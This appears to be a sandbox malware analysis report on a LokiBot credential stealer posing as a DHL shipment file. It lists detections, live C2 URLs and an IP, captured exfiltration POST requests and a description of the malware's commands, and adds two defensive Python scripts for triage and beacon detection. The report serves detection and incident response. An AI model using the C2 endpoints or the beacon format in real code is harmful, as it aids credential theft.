
Windows Analysis Report
DHL_Express_Shipment_DOC.exe

Overview

General Information

Sample Name: DHL_Express_Shipment_DOC.exe
Analysis ID: 831160
MD5: 370ebdf4ff5036c106793994cc851779
SHA1: cc04ea26c1364b9a058b55c8697a49e1c7e16970
SHA256: 1ebedb652fa27423240c3efa860e7551958811120737ee5d3ea7badf671fbacf
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cleanup
Name: Loki Password Stealer (PWS), LokiBot

Description: "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Their purpose:

  FILE EXTENSION  FILE DESCRIPTION
  .exe            A copy of the malware that will execute every time the user account is logged into
  .lck            A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
  .hdb            A database of hashes for data that has already been exfiltrated to the C2 server
  .kdb            A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data. The second packet transmitted by Loki-Bot contains decrypted Windows credentials. The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version. The second WORD of the HTTP Payload is the Payload Type. Identified payload types:

  BYTE  PAYLOAD TYPE
  0x26  Stolen Cryptocurrency Wallet
  0x27  Stolen Application Data
  0x28  Get C2 Commands from C2 Server
  0x29  Stolen File
  0x2A  POS (Point of Sale?)
  0x2B  Keylogger Data
  0x2C  Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

  BYTE  INSTRUCTION DESCRIPTION
  0x00  Download EXE & Execute
  0x01  Download DLL & Load #1
  0x02  Download DLL & Load #2
  0x08  Delete HDB File
  0x09  Start Keylogger
  0x0A  Mine & Steal Data
  0x0E  Exit Loki-Bot
  0x0F  Upgrade Loki-Bot
  0x10  Change C2 Polling Frequency
  0x11  Delete Executables & Exit

Suricata Signatures:

  RULE SID  RULE NAME
  2024311   ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
  2024312   ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
  2024313   ET TROJAN Loki Bot Request for C2 Commands Detected M1
  2024314   ET TROJAN Loki Bot File Exfiltration Detected
  2024315   ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
  2024316   ET TROJAN Loki Bot Screenshot Exfiltration Detected
  2024317   ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
  2024318   ET TROJAN Loki Bot Request for C2 Commands Detected M2
  2024319   ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
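Added example (Python), not part of the Joe Sandbox report and not Loki-Bot's own code: it turns the artefact-naming and payload-framing rules in the description above into something a responder can run against a host or a captured POST body. Assumptions not stated on the page: the MD5 input is the Machine GUID string hashed as UTF-8 exactly as stored in the registry (no braces added), both leading WORDs are little-endian, and the Binary ID that begins at the 11th byte is a NUL-terminated ASCII string. The sample POST body is constructed; the mutex used in the checks is the one quoted in the description.

```python
"""Derive Loki-Bot host artefact names and decode the leading fields of a Loki-Bot
HTTP POST body, following the description above. Added example, not report code."""
import hashlib
import struct

# Payload types from the table above (second WORD of the HTTP body).
PAYLOAD_TYPES = {
    0x26: "Stolen Cryptocurrency Wallet",
    0x27: "Stolen Application Data",
    0x28: "Get C2 Commands from C2 Server",
    0x29: "Stolen File",
    0x2A: "POS (Point of Sale?)",
    0x2B: "Keylogger Data",
    0x2C: "Screenshot",
}
DEFAULT_BINARY_ID = "ckav.ru"          # the Binary ID the description calls typical
EXAMPLE_MUTEX = "B7E1C2CC98066B250DDB2123"  # example mutex quoted in the description


def read_machine_guid() -> str:
    """Read the Machine GUID Loki-Bot hashes (Windows only; used in __main__)."""
    import winreg
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Cryptography",
                         0, winreg.KEY_READ | winreg.KEY_WOW64_64KEY)
    with key:
        return winreg.QueryValueEx(key, "MachineGuid")[0]


def loki_mutex(machine_guid: str) -> str:
    """MD5 of the Machine GUID, upper-case hex, trimmed to 24 characters.
    Assumption: the GUID string is hashed as UTF-8 with no braces added."""
    return hashlib.md5(machine_guid.encode("utf-8")).hexdigest().upper()[:24]


def loki_artifacts(mutex: str) -> dict:
    """Folder name = characters 8..13 of the mutex, file basename = characters 13..18
    (1-based, as the description counts them); the folder is created hidden."""
    if len(mutex) != 24:
        raise ValueError("Loki-Bot mutex is 24 hex characters")
    folder = mutex[7:13]
    base = mutex[12:18]
    return {
        "mutex": mutex,
        "appdata_dir": "%APPDATA%\\" + folder + "\\",
        "files": [base + "." + ext for ext in ("exe", "lck", "hdb", "kdb")],
    }


def parse_loki_payload(body: bytes) -> dict:
    """Decode version WORD, payload-type WORD and the Binary ID from a POST body."""
    if len(body) < 11:
        raise ValueError("body too short for a Loki-Bot payload header")
    version, ptype = struct.unpack_from("<HH", body, 0)  # assumption: little-endian
    end = body.find(b"\x00", 10)                          # assumption: NUL-terminated ID
    if end == -1:
        end = len(body)
    binary_id = body[10:end].decode("ascii", errors="replace")
    return {
        "version": version,
        "payload_type": ptype,
        "payload_name": PAYLOAD_TYPES.get(ptype, "unknown (0x%02X)" % ptype),
        "binary_id": binary_id,
        "binary_id_is_default": binary_id == DEFAULT_BINARY_ID,
    }


# Constructed sample body: version 0x0012, type 0x27, six filler bytes, then the ID.
SAMPLE_PAYLOAD = (
    bytes([0x12, 0x00, 0x27, 0x00])
    + b"\x00" * 6
    + b"ckav.ru\x00"
    + b"<constructed application data>"
)

if __name__ == "__main__":
    try:
        mutex = loki_mutex(read_machine_guid())   # real value on a Windows host
    except ImportError:
        mutex = EXAMPLE_MUTEX                     # elsewhere, use the quoted example
    print(loki_artifacts(mutex))
    print(parse_loki_payload(SAMPLE_PAYLOAD))
```

On a Windows host the script prints the exact %APPDATA% directory and the four file names to sweep for; on a captured body, a Binary ID other than ckav.ru is the campaign-tracking signal the description tells you to take note of.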
Yara matches (Rule | Description | Author, followed by matched strings where reported):

Source: dump.pcap
  JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
  JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
  INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen
    • 0x17936:$f1: FileZilla\recentservers.xml
    • 0x17976:$f2: FileZilla\sitemanager.xml
    • 0x15be6:$b2: Mozilla\Firefox\Profiles
    • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    • 0x15afa:$s4: logins.json
    • 0x169a4:$s6: wand.dat
    • 0x15424:$a1: username_value
    • 0x15414:$a2: password_value
    • 0x15a5f:$a3: encryptedUsername
    • 0x15acc:$a3: encryptedUsername
    • 0x15a72:$a4: encryptedPassword
    • 0x15ae0:$a4: encryptedPassword
  Windows_Trojan_Lokibot_1f885282 | unknown | unknown
    • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
  (7 entries in total; the remaining entries are not reproduced here)

Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack
  JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
  JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
  INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen
    • 0x17936:$f1: FileZilla\recentservers.xml
    • 0x17976:$f2: FileZilla\sitemanager.xml
    • 0x15be6:$b2: Mozilla\Firefox\Profiles
    • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    • 0x15afa:$s4: logins.json
    • 0x169a4:$s6: wand.dat
    • 0x15424:$a1: username_value
    • 0x15414:$a2: password_value
    • 0x15a5f:$a3: encryptedUsername
    • 0x15acc:$a3: encryptedUsername
    • 0x15a72:$a4: encryptedPassword
    • 0x15ae0:$a4: encryptedPassword
  Windows_Trojan_Lokibot_1f885282 | unknown | unknown
    • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
  (11 entries in total; the remaining entries are not reproduced here)
                No Sigma rule has matched
Snort IDS alerts (all TCP, 192.168.2.4 -> 64.227.48.212:80, classtype "A Network Trojan was detected"):

  Timestamp                 Source port  SID
  03/21/23-07:13:21.229954  49697        2021641
  03/21/23-07:13:21.229954  49697        2024312
  03/21/23-07:13:21.229954  49697        2024317
  03/21/23-07:13:22.578656  49698        2021641
  03/21/23-07:13:22.578656  49698        2024312
  03/21/23-07:13:22.578656  49698        2024317
  03/21/23-07:13:23.800015  49699        2021641
  03/21/23-07:13:23.800015  49699        2024313
  03/21/23-07:13:23.800015  49699        2024318
  03/21/23-07:13:25.127064  49700        2021641
  03/21/23-07:13:25.127064  49700        2024313
  03/21/23-07:13:25.127064  49700        2024318
  03/21/23-07:13:27.165442  49701        2021641
  03/21/23-07:13:27.165442  49701        2024313
  03/21/23-07:13:27.165442  49701        2024318
  03/21/23-07:13:28.916498  49702        2021641
  03/21/23-07:13:28.916498  49702        2024313
  03/21/23-07:13:28.916498  49702        2024318

                AV Detection

Source: DHL_Express_Shipment_DOC.exe | ReversingLabs: Detection: 18%
Source: DHL_Express_Shipment_DOC.exe | Virustotal: Detection: 30%
Source: DHL_Express_Shipment_DOC.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source: DHL_Express_Shipment_DOC.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_Express_Shipment_DOC.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: xqcD.pdb | source: DHL_Express_Shipment_DOC.exe
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_00403D74 FindFirstFileW, FindNextFileW, FindFirstFileW, FindNextFileW

                Networking

Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 192.168.2.4:49697 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) | 192.168.2.4:49697 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 192.168.2.4:49697 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 192.168.2.4:49698 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) | 192.168.2.4:49698 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 192.168.2.4:49698 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 | 192.168.2.4:49699 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) | 192.168.2.4:49699 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 | 192.168.2.4:49699 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 | 192.168.2.4:49700 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) | 192.168.2.4:49700 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 | 192.168.2.4:49700 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 | 192.168.2.4:49701 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) | 192.168.2.4:49701 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 | 192.168.2.4:49701 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 | 192.168.2.4:49702 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) | 192.168.2.4:49702 -> 64.227.48.212:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 | 192.168.2.4:49702 -> 64.227.48.212:80
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | IP Address: 64.227.48.212
Source: global traffic | HTTP traffic detected: the same POST request was observed 6 times (2 with Content-Length: 190, 4 with Content-Length: 163; all other headers identical):
  POST /?page_id=215360 HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 64.227.48.212
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 2F9D8E6A
  Content-Length: 190 (2 requests) / 163 (4 requests)
  Connection: close
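Added example (Python), not from the report and not an Emerging Threats rule: a header-level check for the beacon shape in the captured POST requests above, of the kind you would drop into a proxy-log or PCAP triage script. The request text is reconstructed from the report's header list and the benign request is constructed; the indicator set and the "one strong or two weak" decision are this example's own choices, not the logic of the Snort/Suricata rules that fired.

```python
"""Flag Loki-Bot beacon characteristics in a raw HTTP request. Added example; the
sample requests are constructed from the headers listed in the report above."""
import ipaddress

LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"   # what ET 2021641 keys on

# Reconstructed from the captured request above (constructed sample, body omitted).
SAMPLE_REQUEST = (
    "POST /?page_id=215360 HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 64.227.48.212\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 2F9D8E6A\r\n"
    "Content-Length: 190\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed benign request for comparison.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: */*\r\n"
    "\r\n"
)


def parse_request(raw: str):
    """Split a raw request into (method, path, protocol, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, path, proto = parts
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return method, path, proto, headers, body


def host_is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IP (no DNS lookup preceded the connection)."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])   # drop an optional :port
        return True
    except ValueError:
        return False


def loki_indicators(raw: str) -> list:
    """Return the Loki-Bot indicators present in the request, strongest first."""
    method, path, proto, headers, body = parse_request(raw)
    hits = []
    if headers.get("user-agent") == LOKI_USER_AGENT:
        hits.append("user-agent Charon/Inferno")
    if "content-key" in headers:
        hits.append("Content-Key header present")
    if (method == "POST" and proto == "HTTP/1.0"
            and headers.get("content-type") == "application/octet-stream"):
        hits.append("HTTP/1.0 POST of application/octet-stream")
    if headers.get("content-encoding") == "binary":
        hits.append("Content-Encoding: binary")
    if host_is_ip_literal(headers.get("host", "")):
        hits.append("Host is a bare IP literal")
    return hits


def is_loki_beacon(raw: str) -> bool:
    """The user-agent alone is decisive; otherwise require two weaker indicators."""
    hits = loki_indicators(raw)
    return "user-agent Charon/Inferno" in hits or len(hits) >= 2


if __name__ == "__main__":
    for label, req in (("captured", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, is_loki_beacon(req), loki_indicators(req))
```

The user-agent string is trivially changed by the operator, which is why the weaker structural indicators (HTTP/1.0 POST of an octet-stream to a bare IP, a Content-Key header, Content-Encoding: binary) are kept as a fallback rather than relying on the UA alone.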
Source: unknown | TCP traffic detected without corresponding DNS query: 64.227.48.212 (reported 50 times)
Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.486364234.000000000049F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://64.227.48.212/?page_id=215360
Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://robertmario.is/?feed=comments-rss2
Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://robertmario.is/?feed=rss2
Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://robertmario.is/index.php?rest_route=/
Source: DHL_Express_Shipment_DOC.exe, DHL_Express_Shipment_DOC.exe, 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.w.org/
Source: unknown | HTTP traffic detected: POST /?page_id=215360 HTTP/1.0; User-Agent: Mozilla/4.08 (Charon; Inferno); Host: 64.227.48.212; Accept: */*; Content-Type: application/octet-stream; Content-Encoding: binary; Content-Key: 2F9D8E6A; Content-Length: 190; Connection: close
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_00404ED4 recv

                System Summary

                barindex
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: initial sampleStatic PE information: Filename: DHL_Express_Shipment_DOC.exe
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
